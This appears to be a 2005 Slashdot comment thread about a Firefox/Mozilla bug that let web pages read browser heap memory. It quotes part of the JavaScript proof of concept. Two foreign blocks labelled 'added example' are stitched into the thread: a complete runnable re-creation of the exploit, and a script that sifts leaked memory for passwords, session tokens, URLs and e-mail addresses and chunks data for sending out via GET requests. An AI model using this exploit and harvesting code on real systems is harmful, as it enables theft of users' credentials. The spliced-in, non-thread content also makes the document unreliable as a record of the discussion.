Mozilla / Firefox Memory Exposure Vulnerability
JimmyM writes "Secunia has a story regarding a new severe vulnerability in the Mozilla Suite and Firefox browser, which can be exploited by any web site to read all memory, which the browser process has access to. No patch is available from Mozilla. A demonstration is available here."
Did the Mozilla/Firefox guys ignore a warning? (Score:4, Insightful)
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:3, Interesting)
Just tested out the "proof test" myself. Amazing, some of the stuff I still had in memory here.
Followed by the browser shutting itself down after about 20 furious clicks on the link!
IE & Opera Unaffected (Score:5, Interesting)
Clearly a Mozilla-specific problem.
Re:IE & Opera Unaffected (Score:3, Funny)
"Mozilla / Firefox / IE / Opera Memory Exposure Vulnerability"
wouldn't it?
Re:IE & Opera Unaffected (Score:2)
Problem?
Re:IE & Opera Unaffected (Score:5, Insightful)
Re:IE & Opera Unaffected (Score:2)
I'm just getting Xs even after hammering on the link for a bit.
Browser is Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050404 Firefox/1.0 (Ubuntu package 1.0.2)
I guess that even though this is version 1.0.2, someone in Debian or Ubuntu backported the fix and it was available in my last update.
Re:IE & Opera Unaffected (Score:2)
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:3, Informative)
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:5, Informative)
Opened: 2005-04-01 13:40 PDT
Last modified: 2005-04-01 22:39 PDT
Resolution: FIXED
So yes, they did: it was fixed in under 10 hours, and published 3 days later.
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:5, Interesting)
------- Additional Comment #6 From Brendan Eich 2005-04-01 17:49 PDT -------
BTW, this bug is like 8+ years old. Roger Lawrence fixed half of it in 2000:
r=norris,waldemar
Fixes for bugs#23607, 23608, 23610, 23612, 23613. Also, first cut at URI
encode & decode routines.
Unfortunately, AFAICT none of the bugs he cites had anything to do with the two
hunks of that revision:
@@ -1061,16 +1080,22 @@ find_replen(JSContext *cx, ReplaceData *
@@ -1138,16 +1163,17 @@ find_replen(JSContext *cx, ReplaceData *
that half-fixed the original 1997-era bug.
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:2)
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:2)
"did this site publish the vulnerability without giving them a chance to patch?"
But that's wrong too. I meant to say that yes they did inform the Moz devs of this before going public.
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:2)
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:3, Informative)
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:3, Informative)
Or just drag the link over the tab bar. Over an empty space (or the close button if it's full) to create a new tab, or over an existing tab to load the link there.
Re:Did the Mozilla/Firefox guys ignore a warning? (Score:2)
Confusing write-up (Score:4, Interesting)
Re:Confusing write-up (Score:2)
Re:Confusing write-up (Score:5, Informative)
The data is being displayed within a TEXTAREA box, so it's probably as simple as adding an onClick="javascript:document.form.submit();" (or onMouseOver, etc.) to the document.
Yes, this is very dangerous.
Ok, confirmed (Score:5, Informative)
Re:Confusing write-up (Score:1)
Re:Confusing write-up (Score:3, Informative)
Re:Confusing write-up (Score:3, Interesting)
Also from the article:
"A vulnerability has been discovered in various Mozilla products, which can be exploited by malicious people to gain knowledge of potentially sensitive information."
So yeah, this is a bit more dangerous than the old load the root folder in an ifr
Re:Confusing write-up (Score:4, Interesting)
I don't think this is necessarily a huge problem - it's a critical bug, but until we see some major code execution or phishing, it probably won't be as big of a deal as it could be.
The question is, can they find out how big of a memory chunk they can read before they start reading? If so, they could grab god knows how many megs and start uploading it somewhere (somehow - that's too big for a GET query) and just dump it, but if they read too much and try to read what Firefox can't access, it should (emphasis 'should') get killed by Windows instead of failing silently.
I'm shocked! (Score:5, Interesting)
But now it seems there are patches for Mozilla every few weeks for _exactly_ the same kind of problems that IE used to get slated for.
Is Mozilla actually more secure? Or is it just as bad as any other piece of software?
Re:I'm shocked! (Score:2)
Re:I'm shocked! (Score:1)
Re:I'm shocked! (Score:3, Informative)
Well, unlike MSIE this is a bug rather than a feature (ActiveX), and all software has bugs, but apparently it is patched, so it will be rolled out soon.
Getting details on this is not the easiest but aco
Re:I'm shocked! (Score:1)
Re:Mod parent something else .. (Score:2)
(I do not care about the karma, my karma is maxed out and this won't hurt it any)
FCat
Re:I'm shocked! (Score:3)
So the original assertion is still, at least partly true: The software underneath the apps is more secure.
Re:I'm shocked! (Score:3, Insightful)
Of course, I can reinstall the OS in about two hours.
It's my documents I actually care about...
Re:I'm shocked! (Score:2)
Re:I'm shocked! (Score:2)
Two hours when you have a deadline is a lot of money.
Two hours in the workplace would not be acceptable.
Plus, you would need to know your system has been compromised in the first place, and then reinstall the same unsecure software.
With mozilla, you could wait 8 more hours, and install a patched version of your software.
Re:I'm shocked! (Score:2)
To be fair, a good bug in Mozilla can take your X server down, or at least make it so unresponsive that you can't do anything. Or it could kill your window manager, probably logging you out. And if things do get really stuck, you may have to log in from another system (or hit the vulcan nerve pinch keys -- either kill X, get to a VC and maybe C-A-D.)
Not quite as bad as ta
Re:I'm shocked! (Score:2, Insightful)
Re:I'm shocked! (Score:2)
And if it's younger then it's had less time to have horrible crustiness develop.
Either way round isn't an excuse.
Re:I'm shocked! (Score:2)
Re:I'm shocked! (Score:2)
Re:I'm shocked! (Score:3, Insightful)
And Linux is at version 2.6.something, and Windows is at version 2003 and Solaris is at version 10 (having jumped from 2.6 to 7.) Fedora Core is at FC3 (or is that RH12?) Doom is up to Doom 3, and Jake 2.0 was released at 2.0 and never made 2.1. And I think Sid died at version 6.7. Relevance?
Version numbers don't mean anything. They're arbitrary, and you cannot compare them to the numbers of other products l
Re:I'm shocked! (Score:2)
Re:I'm shocked! (Score:1, Insightful)
No, he was mocking someone else who did:
Mozilla is at version 1.7.5 and Firefox is at version 1.x. IE is approaching version 7.0.
Re:I'm shocked! (Score:2)
Re:I'm shocked! (Score:2)
Re:I'm shocked! (Score:2)
Here's the definition of quantitive http://dictionary.reference.com/search?q=quantiti
I hope this doesn't exceed your fourth grade reading level.
Re:I'm shocked! (Score:4, Informative)
It's a commonly held belief that Microsoft programmers come from Elbonia. Once it is accepted that Mozilla programmers are just as Elbonian as MS Programmers, the security zealousy will die down.
(Disclaimer 1: This post does not say that Mozilla is less secure (or more secure, for that matter) than IE. This post does not say that Mozilla programmers are incompetent. This post does address zealotry and nothing else.)
(Disclaimer 2: It really fucking pisses me off that I have to write this stupid disclaimer because lots of people with mod-points will not accept anything that's even remotely negative about Mozilla. Learn how to take criticism before dispensing it.)
Re:I'm shocked! (Score:2)
Re:I'm shocked! (Score:2)
MS's feature list comes from the marketing dept. Its release deadlines come from the marketing dept plus reality. If reality-based delays don't meet marketing expectations, we don't know what they do.
Mozilla developers can be put to test, because we can read their code, there is even people who do read their code. If you got any conclusions on the mozilla developers skill, you couldn't extrapolate them to MS developers, because y
Re:I'm shocked! (Score:2)
And Open Source programmers come from the good programmers cabbage patch or something?
" there is even people who do read their code."
If they feel like it. Sadly, errors and half-assed functionality still get through.
"Mozilla feature list comes from user feedback + whatever the maintainers feel is sensible to add."
Whatever they feel like adding. (Or, more appropriately, copying from another app.)
"So, what I mean is that there can be other reasons than
Re:I'm shocked! (Score:2)
I believe you are not quoting right.
The OP stated that there is some amount of error inherent to software development, and that MS developers were supposed to be assumed to have the same quality as mozilla developers.
What I meant is that mozilla developers produce code of a much more measurable (for the general public) quality, and that fact for itself is important.
What I exactly meant is that it does matter what you are using, because you can make an more informed decision about whether yo
Re:I'm shocked! (Score:2)
Actually, from the end-user point of view, Opera's probably the best one out there. Depends on how you view it, though.
"What I meant is that mozilla developers produce code of a much more measurable (for the general public) quality, and that fact for itself is important."
I'm not sure I agree with that, but I don't think I can strongly dispute it either. Frankly, I'm not impressed with OSS software. I mean, some of it I am. A lot of it, I'm not. My idea of quality is that featur
Re:I'm shocked! (Score:2)
Opera, I used to like.
Now I don't use windows anymore, and I choose not to use non-free software, for ethical rather than technical reasons. That doesn't mean I don't care about features. I even run some non-free software when I just need to, to get my work done.
What happens to me with Opera is that it was great, tabs were really great. Now Firefox is just smoother to me. I am a usability freak, too. It just happens that Firefox doesn't have usability issues that interfere with _my_ habits. I lik
Re:I'm shocked! (Score:2)
To each is own. Me personally, I enjoy all the little things they did to make browsing easier. Magnifying glass, 'paste and go' in the address bar, the notes panel, the mail client that is brilliant for handling forum email, etc. Whenever I use FireFox, I end up looking for buttons that aren't there.
"When you talk about innovat
Re:I'm shocked! (Score:5, Interesting)
In terms of design decisions, you might easily say that Mozilla is more secure than IE. (not being integrated with OS and all..) In terms of coding bugs, Mozilla is no different than any other super complex piece of software. But there's another way to look at it. Because the Mozilla code is open, we might expect an ugly rash of bugs to be found near the beginning of its rise to popularity. But we might also expect this to rapidly taper off as all the major bugs are found and squashed. So you might say that now is a relatively dangerous time to use Mozilla (instead of say.. Konqueror or Safari). But, on the other hand, it's still not quite popular enough to attract the volume of real-world attacks that IE has received. Honestly, if you're some jerk running a malicious website, are you going to target this quirky bug in Mozilla or the myriad of IE exploits that are sure to pay off?
What does bother me is that the Mozilla folks haven't taken automated updates seriously enough. I cringe to think of how many Firefox early adopters have no clue what that little red arrow at the top of their screen is. Or if they do, how many dial-up users will be patient enough to wait for the update to download.. which isn't really an update at all but a full copy of the latest version.
Re:I'm shocked! (Score:2)
If mozilla has some critical bug, you can always disable mozilla and use konqueror until mozilla releases a fix. That would be a day or two without mozilla.
In an IE scenario, you would not be able to disable IE, plus there's no reasonable amount of time after which you can expect a bug will be fixed.
No one is talking about bug-free software. Bug-free software is just not worth it; it would take too much time and money to be useful.
The thing with IE is
No shock at all (Score:2)
If you can't or don't want to do an audit of the source, it's usually safe to assume it's probably just as bad as whatever software the Mozilla programmers used to write.
A good tree produces good fruit. A bad tree produces bad fruit. Sure you can get a tree to change, but it often takes years (see BIND, Sendmail).
The fact that Mozilla crashes regularly (but not so predictably) on normal use (well at least my normal use
oh man (Score:2, Funny)
Interesting (Score:1)
Re:Interesting (Score:1)
Re:Interesting (Score:1)
Re:Interesting (Score:2)
They say that open source... (Score:1, Insightful)
Re:They say that open source... (Score:2)
Re:They say that open source... (Score:2)
Here's a link [mozilla.org]
Re:They say that open source... (Score:1)
Re:They say that open source... (Score:2)
Considering this whole is already fixed, it's hard to ask for faster than that!
On the other hand...
So I'm wondering, just how long will the Mozilla foundation take to distribute a fix for this
That's another question altogether, and one that isn't done so well with Firefox. Still far better than with IE (where you see actively exploited vulnerabilities listed on MS's IE page that aren't fixed for months!). This is something the Mozilla folks
It looks like it requires Javascript (Score:3, Interesting)
Once again demonstrating the danger in the current mindset of "I will use Javascript to do everything, even things that can be done with plain HTML like opening a new window".
I have my Mozilla configured to ask me if I want it to fetch Javascript from remote sites (alas, you cannot protect yourself from Javascript embedded in the HTML of the site you are visiting), to ask me if I want to run any requested plugins, and to ask me before allowing any cookies to be set on my browser.
If you can, try this yourself - you will be AMAZED at the number of sites that insist upon setting a cookie on you the first thing when you visit them, or that insist upon trying to load Javascript or Flash plugins.
Cookies are fine for sites which require log-in (e.g.
But please don't over use them.
Re:It looks like it requires Javascript (Score:3, Informative)
Re:Just a clarification (Score:2)
Re:It looks like it requires Javascript (Score:2)
I have yet to see a web application in Flash that couldn't be implemented in plain HTML with maybe a touch of server-side scripting. So-called Flash "movies" don't count, because those could simply be saved to disk via web browser without involving a plugin, and then could be played back without any online component at all.
Of greatest annoyance are websites with Flash intros lacking a way to get past the intro, or with Flash navigation instead of a simple imagemap. N
Re:It looks like it requires Javascript (Score:2)
Opening a new window has been deprecated in XHTML - the only way to do it is JavaShit. Which is good because I hate webmasters assuming I want links opened in a new window (I almost never do - if I did I would've clicked "open in new window"). Unfortunately it's bad because they'll just use Javascript instead.
Definitely a big hole (Score:5, Insightful)
If this could be automated (and it easily could be with something like XML-RPC), imagine the possibilities for phishing. Visit a page, have your credit card number disclosed.
Time for Firefox 1.03.
Re:Definitely a big hole (Score:2)
And you were dumb enough to assume that I didn't check the source code before clicking the button. No data is transmitted with this example.
Of course, other websites may not be so forgiving.
Simple JavaScript (Score:2, Insightful)
It's almost scary... the JavaScript for this looks to just abuse a buffer overflow in an almost scary-easy way.
function genGluck(str){
    var x = str;
    var rx=/end/i;
    x = x.replace(rx,function($1){
        $1.match(rx);
        return "";
    });
    x = x.replace(/^end/,"");
    return x;
}
function readMemory()
{
    // the PoC passes a 10,246-character run of X's followed by "end"
    var mem = genGluck("{10,246 X's here}end");
    mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g,
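The snippet above is cut off, so here is a self-contained re-creation of the same re-entrant String.prototype.replace pattern, written as an added example rather than taken from the thread or from Mozilla's code. It wraps the pattern in a check that reports whether the engine running it returns anything other than the padding it was given. The padding length of 10,246 matches the PoC; genGluck and leakCheck are the names used here, and the mechanism comment summarises the Bugzilla discussion quoted earlier (the length of the replace result was derived from match state that the callback could alter, which is why find_replen is where the quoted fix lives).

```javascript
// Added example, not code from the thread or from Mozilla: a self-contained
// re-creation of the re-entrant String.prototype.replace pattern used by the
// proof-of-concept, wrapped in a check that reports whether the engine leaks.
// The PoC's padding length (10,246 X's) is kept as the default; it only has to
// be large enough that the result string lands in a fresh heap allocation.
const PAD_LEN = 10246;
const MARKER = "end";

// Same shape as the PoC's genGluck: replace the marker with a callback that
// re-runs the same regex object before returning an empty string. In the 2005
// engine the result length was computed from match state that the callback
// could change underneath it (find_replen, the function named in the Bugzilla
// comment quoted above), so the bytes copied did not fill the buffer that was
// handed back and the remainder was whatever the heap already held.
function genGluck(str) {
  const rx = /end/i;
  const x = str.replace(rx, function (match) {
    match.match(rx); // re-entrancy: regex state changes mid-replace
    return "";
  });
  return x.replace(/^end/, "");
}

// Run the pattern and classify the result. A correct engine returns exactly
// the padding; any other character, or any change in length, is data the
// engine should never have exposed.
function leakCheck(padLen = PAD_LEN) {
  const input = "X".repeat(padLen) + MARKER;
  const out = genGluck(input);
  const unexpected = out.replace(/X/g, "");
  return {
    expected: padLen,
    length: out.length,
    leaked: out.length !== padLen || unexpected.length > 0,
    sample: unexpected.slice(0, 64), // first bytes of anything foreign
  };
}

// Stand-alone usage: prints { expected: 10246, length: 10246, leaked: false, sample: '' }
// on a fixed engine.
console.log(leakCheck());
```

The check is deliberately engine-agnostic: it does not look for a specific string in the output, only for the invariant that replacing a three-character suffix with nothing must leave the padding untouched. That is the same invariant the thread's readers were eyeballing when they reported "just X's" versus "stuff I still had in memory".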
No problem here (Score:2, Informative)
using OSX with nightly builds auto-downloaded with FireFix [macupdate.com] (which is a really neat app)
Re:No problem here (Score:3, Funny)
Safari slightly vulnerable? (Score:3, Insightful)
Re:Safari slightly vulnerable? (Score:3, Insightful)
Download the latest patched version right here (Score:3, Informative)
I just used it and I am not vulnerable: all I see are lots of X's, just like in IE.
Access to firefox heap, not entire system (Score:3, Insightful)
This data is available to the javascript engine then, so it is possible for the javascript to submit it a number of ways to an internet server. It could call a web service with the data or post it to a web page. The server could then organize this data and examine it for anything interesting.
This will not allow someone to read your personal files or hijack your computer. The real problem would be if stored passwords or sensitive data from web mail or banking sites were on the heap and were found this way and transmitted to a web site. A large amount of 'Junk' would have to be sifted through in order to get any juicy data though.
The only way to be safe right now is (in FireFox) to go to Tools->Options, go to "Web Features", and uncheck "Enable Javascript". Seeing as many sites (including /.) require javascript to use, this really isn't a good option. I hope the team gets a fixed version out soon.
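The post above makes two points worth seeing in code: the leaked heap is mostly junk that has to be sifted, and whatever survives the sifting can leave the browser by a form post or a web-service call. The block below is an added example, not code from the thread, that does the sifting on a constructed stand-in for the PoC's TEXTAREA contents: it keeps runs of printable ASCII (the same idea as the truncated character-class filter in the PoC), then pulls out URLs, credential-looking name/value pairs and e-mail addresses. The key list, the thresholds and SAMPLE_BLOB are all constructed for illustration. It also answers the earlier "too big for a GET query" objection by showing how little of the raw dump an attacker actually needs to move, and how the rest can be split into query-sized pieces anyway.

```javascript
// Added example, not code from the thread: triage of a leaked-heap string.
// Mirrors the printable-only filter the PoC applies, then pulls out the items
// an attacker would actually want. Key list and sample data are constructed.
const PRINTABLE_RUN = /[\x20-\x7e]{8,}/g; // runs of 8+ printable ASCII chars
const URL_RE = /https?:\/\/[^\s"'<>]+/g;
const SENSITIVE_KV =
  /\b(pass(?:word|wd)?|pwd|session(?:id)?|sid|token)\s*[=:]\s*([^\s&;"']+)/gi;
const EMAIL_RE = /[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,}/gi;

// Constructed stand-in for what the PoC's TEXTAREA might contain: mostly
// non-printable bytes with a few recognisable fragments buried in them.
const SAMPLE_BLOB =
  "\x00\x01\x7fXXXXXXXXXXXX\x00GET /mail/inbox HTTP/1.1\x00\x03" +
  "https://bank.example/login?user=alice&password=hunter2\x00\x00" +
  "Cookie: sessionid=deadbeef1234\x00ab\x00alice@example.org\x00\xff\xfe";

// Step 1: drop everything that is not a run of printable characters.
function printableRuns(blob) {
  return blob.match(PRINTABLE_RUN) || [];
}

// Step 2: extract the high-value strings from what is left. Runs are joined
// with newlines so that a match can never span two unrelated fragments.
function siftLeak(blob) {
  const runs = printableRuns(blob);
  const text = runs.join("\n");
  const creds = [];
  for (const m of text.matchAll(SENSITIVE_KV)) {
    creds.push({ key: m[1].toLowerCase(), value: m[2] });
  }
  return {
    runs: runs.length,
    urls: [...new Set(text.match(URL_RE) || [])],
    creds,
    emails: [...new Set(text.match(EMAIL_RE) || [])],
  };
}

// The "too big for a GET query" objection only holds for the raw heap. Even
// raw data can be cut into query-sized, URL-safe pieces and reassembled on
// the receiving side; the findings above are a few hundred bytes in any case.
function chunkForGet(data, charsPerChunk = 1024) {
  const chunks = [];
  for (let i = 0; i < data.length; i += charsPerChunk) {
    chunks.push(encodeURIComponent(data.slice(i, i + charsPerChunk)));
  }
  return chunks;
}

// Stand-alone usage.
console.log(siftLeak(SAMPLE_BLOB));
console.log(chunkForGet(SAMPLE_BLOB, 64).length, "chunks");
```

The defensive reading of this block is the one the thread circles around: the raw dump being large and noisy is not a mitigation, because the interesting material (session identifiers, URLs with credentials in the query string, addresses) is exactly what a handful of regular expressions find first, and it is small enough to leave by any channel the page can open.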
Re:Access to firefox heap, not entire system (Score:1, Informative)
Seeing as many sites (including /.) require javascript to use, this really isn't a good option.
This is bullshit. Lots of sites use Javascript, but very few sites require Javascript. Slashdot is one example of a website that uses Javascript without requiring it.
So ignore the parent, go ahead and switch Javascript off. If you find a website that is broken, email a complaint, and, if you trust the website, enable Javascript for that one website, and switch it off again afterwards.
As far as I can te
Re:Access to firefox heap, not entire system (Score:2)
I'd LOVE to have that. there are only a handful of sites that I use that NEED js. most don't. and in some sites, its BAD to have js on (ie, I get more ads with js t
Re:Access to firefox heap, not entire system (Score:2)
Certainly I have been able to guess the URL by looking at one-line samples of Javascript. Is this possible in general? Would it be good enough to allow you to leave javascript off?
Re:Access to firefox heap, not entire system (Score:2)
Re:Access to firefox heap, not entire system (Score:3, Informative)
since when?
I disable js for all but 1 or 2 sites that I visit.
prefbar (mozilla/firefox) allows a single click to turn on/off jscript. get it and use it.
but you don't need js for slash. you never have.
comma (Score:5, Insightful)
I don't normally complain about the grammar and punctuation of submitters and editors, but in this case it is too significant. The difference between
"read all memory, which the browser process has access to"
and
"read all memory which the browser process has access to"
is profound. The first form says that the browser has access to all memory. The second form says that the web site has access to all the memory to which the browser also has access. Catching and fixing stuff like this is what an editor does. If Slashdot's people can't do that, then don't call them editors. Call them "Dudes Who Click Approve," or something like that.
Re:comma (Score:2)
The only way to pacify MS Word, if you insist upon using "which", is to put the comma before it.
Of course, this is all to say nothing of ending the sentence with a preposition, but that hardly has the impact noted by the parent
Re:comma (Score:1)
Coupon: "No money down!"
Hutz: "What? This thing is all screwed up"
[hutz writes on it]
Coupon now reads: "No. [M]oney down!"
doesn't show anything but XXXXs for me (Score:2)
Re:doesn't show anything but XXXXs for me (Score:2)
Browser string is Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050404 Firefox/1.0 (Ubuntu package 1.0.2), the 4/4/05 makes me think a fix was backported for us. Gives me a little more happiness about Ubuntu and Debian, though I'm sure it has made its way into other distributions as well.
CRASH? (Score:1)
Re:CRASH? (Score:3, Interesting)
Windows 98 SE, Firefox 1.0.2.
Re:CRASH? (Score:1)
Re:CRASH? (Score:2)
Javascript does not have the Java security model.
Java does suck, but for other reasons...
Firefox's autoupdate feature needs serious work. (Score:2)
If they haven't even put 1.0.2 onto the autoupdater, how long will it be before patches like this make it out? It's pretty stupid.
Re:Firefox's autoupdate feature needs serious work (Score:2)
Other Gecko-based browsers affected as well. (Score:3, Insightful)
Re:What? (Score:1)
Same here. I click the link, Firefox crashes. What gives?
Re:What? (Score:1)
Wait, maybe it's not Firefox. Never mind!
rsmith@pingdata.net